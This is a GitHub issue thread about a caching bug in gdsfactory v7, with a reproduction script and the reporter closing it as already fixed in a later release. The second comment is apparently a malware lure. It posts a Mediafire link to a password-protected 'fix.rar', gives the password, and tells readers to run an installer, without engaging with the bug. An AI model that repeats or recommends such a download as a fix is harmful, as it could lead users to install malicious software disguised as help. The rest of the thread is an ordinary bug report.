gdsfactory/gdsfactory #3152: Improper cache hits for some components in v7

octavephotonics, 2024-08-27:
**Describe the bug**
In certain circumstances, calls to cell-decorated functions are getting cached by gdsfactory when they should not be, leading to unexpected behavior.

**To Reproduce**
I'm using gdsfactory 7.9.4 and Anaconda Python 3.11.7.

Below is some minimal example code showing the unexpected behavior. This script should make some rectangles of varying sizes on layer 1, add them to some holder component, then generate copies of the same rectangles on layer 2 by calling an additional function. However, running the code just produces identical layer-two copies as whatever the first function call returns.
```
import numpy as np
import gdsfactory as gf
from gdsfactory.component_layout import Polygon

@gf.cell
def doSomething(inputc):
    return gf.components.rectangle(size=(10, inputc.ysize), layer=(2,0))

main = gf.Component()
width = np.arange(1,5,0.5)

for i,w in enumerate(width):
    holder = gf.Component('tmp',with_uuid=True)
    
    #some polygon with variable dimensions
    c = gf.components.rectangle(size=(10, w),layer=(1,0))
    cref = holder << c
    cref.y = i*10
    
    print('component name: %s'%holder.name)
    offsetcomp = doSomething(holder)
    ocref = main << offsetcomp
    ocref.y = cref.y
    
    main.add_ref(holder)
    
main.write_gds('output.gds')
```

Screenshot of resulting gds. Only a single "doSomething" cell shows in the tree.
[image]

**Expected behavior**
As different components with different identifiers are getting passed on each call to the function, I would expect the function to execute every time rather than using a cached result. The output gds should have identical rectangles on layers 1 and 2.

Avishake2017, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

octavephotonics, 2024-08-27:
Sorry, closing because I see a later v7 release already fixed this.